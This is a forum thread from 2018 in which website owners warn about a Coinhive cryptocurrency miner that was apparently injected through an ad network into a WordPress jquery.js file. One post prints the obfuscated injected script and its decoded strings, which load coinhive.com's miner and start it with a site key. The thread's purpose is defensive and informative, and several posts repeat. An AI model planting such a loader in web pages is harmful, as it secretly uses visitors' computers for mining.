Topic: Warning: potential malicious code originating from advertising network (Read 154 times)
January 30, 2018, 05:18:08 AM
NoScript is quite good for protecting your browser, i run it alongside Adblock Plus...this is true though,ive seen ad content which will download and execute trojans also.
January 30, 2018, 01:39:31 AM
By any chance, were you referring to what is reported here: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
I was not able to compare the scripts used yet.
I was not able to compare the scripts used yet.
January 19, 2018, 05:23:30 AM
I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code.
Install an extension such as Minerblock and load your website.
I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.
Please report your findings here. I won't disclose the network until we have more evidence.
Install an extension such as Minerblock and load your website.
I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.
Please report your findings here. I won't disclose the network until we have more evidence.
There is a lot of mining scripts hidden in adds,I notice that because my antivirus/firewall is block all of them and give me notice every time.I also ask some of faucet owners about mining on their sites but some of them say they never enable such things,so it is obvious that it is hidden in adds.
I do not know is it possible to remove that code without removing adds,but it is not nice to use someone's CPU in this way.It seems that the earnings from crypto related add networks going down and they looking for a way to get some extra profit.
January 19, 2018, 04:26:23 AM
Thanks for the warning
When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention
When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention
This is likely not google, probably smaller crypto-based networks (Coinzilla, a-ads etc;)
Would be great if OP could clarify which network the ad was being served from so people can blacklist them.
January 19, 2018, 03:59:32 AM
I hope more evidence will be posted so more people will be aware especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.
January 18, 2018, 06:24:42 PM
Thanks for the warning
When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention
When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention
January 18, 2018, 05:12:20 PM
Here's the relevant code if anyone is interested:
If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:
Code:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];
function loadScript(_0xca68x2, _0xca68x3) {
var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
_0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
_0xca68x4[_0x7a2c[4]] = _0xca68x2;
_0xca68x4[_0x7a2c[5]] = _0xca68x3;
_0xca68x4[_0x7a2c[6]] = _0xca68x3;
document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
threads: 4
});
_0xca68x5[_0x7a2c[11]]()
});
function loadScript(_0xca68x2, _0xca68x3) {
var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
_0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
_0xca68x4[_0x7a2c[4]] = _0xca68x2;
_0xca68x4[_0x7a2c[5]] = _0xca68x3;
_0xca68x4[_0x7a2c[6]] = _0xca68x3;
document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
threads: 4
});
_0xca68x5[_0x7a2c[11]]()
});
If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:
Code:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
January 18, 2018, 05:01:53 PM
I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code.
Install an extension such as Minerblock and load your website.
I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.
Please report your findings here. I won't disclose the network until we have more evidence.
Install an extension such as Minerblock and load your website.
I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.
Please report your findings here. I won't disclose the network until we have more evidence.
Jump to: